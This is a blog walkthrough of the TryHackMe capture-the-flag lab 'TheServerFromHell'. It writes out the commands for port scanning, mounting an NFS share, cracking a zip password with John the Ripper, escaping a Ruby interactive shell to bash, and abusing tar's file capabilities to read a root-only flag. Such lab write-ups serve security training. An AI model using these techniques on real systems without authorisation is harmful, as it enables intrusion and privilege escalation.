Press "Enter" to skip to content

Tryhackme Walkthrough :TheServer From Hell


Last updated on July 4, 2021

In this articles we are going to solve a another Tryhackme challenge called TheserverfromHell created by Youssef Awad .So without wasting time let go.

Level : Easy

Attacking Strategy

  • Enumeration
    • netcat
    • NFS
  • Exploitation
    • cracking zip file
    • irb shell
  • Privilege Escalation
    • getcap to check file capabilities


Using Rustscan we perform reconnaissance , but as in lab descrption they said check port 1337 so we look into it and there is a hint which tells there something in first 100 ports so scan 100 ports with the help of rustscan.

netcat 1337
rustscan --ulimit 5001 -r 1-110 -- -sC -sV -oN nmap

While checking all the 100 ports our eyes get caught this string on port 21 which by default for FTP Service but here in banner it specify check 12345 .

when we check out the port 12345 with the help of netcat, where we found the another hint which leads to NFS . From the hint we found /home/nfs directory can by mount .

After mounting the file system we get the some backup zip which is password protected .

netcat 12345
showmount -e
mkdir /tmp/serverfromhell
sudo mount -t nfs /tmp/serverfromhell


Now it time to crack the zip password and there are different ways to do that weather you can use frackzip or you can use the john the ripper .

zip2john >backup.hash
john --wordlist=../../rockyou.txt backup.hash

Now we have the credentials to unzip the and after doing we find out that we have key which help us to login into the remote server using ssh pass wordless login but on default port 22 we get the bad request but there is a hint which tells that something is between 2500-4500 so we again load our rustscan to enumerate more and we found that port 3333 have openssh service running .

rustscan --ulimit 5001 -r 2500-4500 -- -sC -sV -oN hint_nmap

Privilege Escalation

Now let’s login to the server with the help of id_rsa key and after login we found that we land on a ruby interactive shell and to get the bash we have to use system function .

chmod 0600 id_rsa
ssh -i id_rsa [email protected] -p 3333
system "/bin/bash"

Now it’s time to get the root power for that let enumerate more and we found hint about getcap and with help of GTFOBIN we exploit it.

getcap -r / 2>/dev/null
tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'

Contact : [email protected] or DM us on twitter.


Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.